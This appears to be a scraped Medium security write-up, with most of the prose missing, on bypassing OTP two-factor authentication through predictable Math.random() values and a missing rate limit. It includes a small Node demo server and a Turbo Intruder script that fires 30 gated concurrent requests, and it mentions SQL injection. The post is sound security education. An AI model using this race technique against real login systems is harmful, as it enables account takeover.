Is Math.random() Safe? from missing rate limit to bypass 2fa and possible sqli

pseudo-randoms

Synchronous vs Asynchronous

const second = () => {
console.log('Hello there!');
}const first = () => {
console.log('Hi there!');
second();
console.log('The End');
}first();
Hi there!
Hello there!
The End

Exploitation

var http = require("http");async function asyncCall() {var x = Math.floor(Math.random() * 1000).toString();return x;}http.createServer(function (request, response) {response.writeHead(200, {'Content-Type': 'text/plain'});asyncCall().then((value) =>{console.log(value);response.end(value);});}).listen(8081);
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)

for i in range(30):
engine.queue(target.req, "", gate='race1')

engine.openGate('race1')
engine.complete(timeout=60)def handleResponse(req, interesting):
table.add(req)

POC

Notes

  • length of the OTP
  • internet connection speed
  • number of requests
  • concurrent Connections
  • the back-end framework

Life Example (Exposing the OTP and sqli)

SQL error

References

--

--

--

My Name Is Yasser and I am a CTF player and Competitive programmer, I Love to build things then break into it.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Dependency Injection overview

Dependency injection

EASILY Create Onboarding Feature Tours with GuideChimp (Tutorial)

Positioning HTML elements Using CSS

Easily Build GraphQL APIs with Prisma

Monorepo for React Native Apps with Nx

monorepo-for-react-native-apps-with-nx

React Hooks with Context as a state management solution

Flutter — Bottom to Up Slide Transition (Add to Cart Bottom to Up Pop-Up Card Animation)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Yasser Mohammed (@boomneroli)

Yasser Mohammed (@boomneroli)

My Name Is Yasser and I am a CTF player and Competitive programmer, I Love to build things then break into it.

More from Medium

How to implement Picture-in-Picture in React.JS for browsers

GitHub site hosting using react js and git-hub API

Why is it necessary to learn about MongoDB as a developer?

CREATE REACT APP WITH PARCEL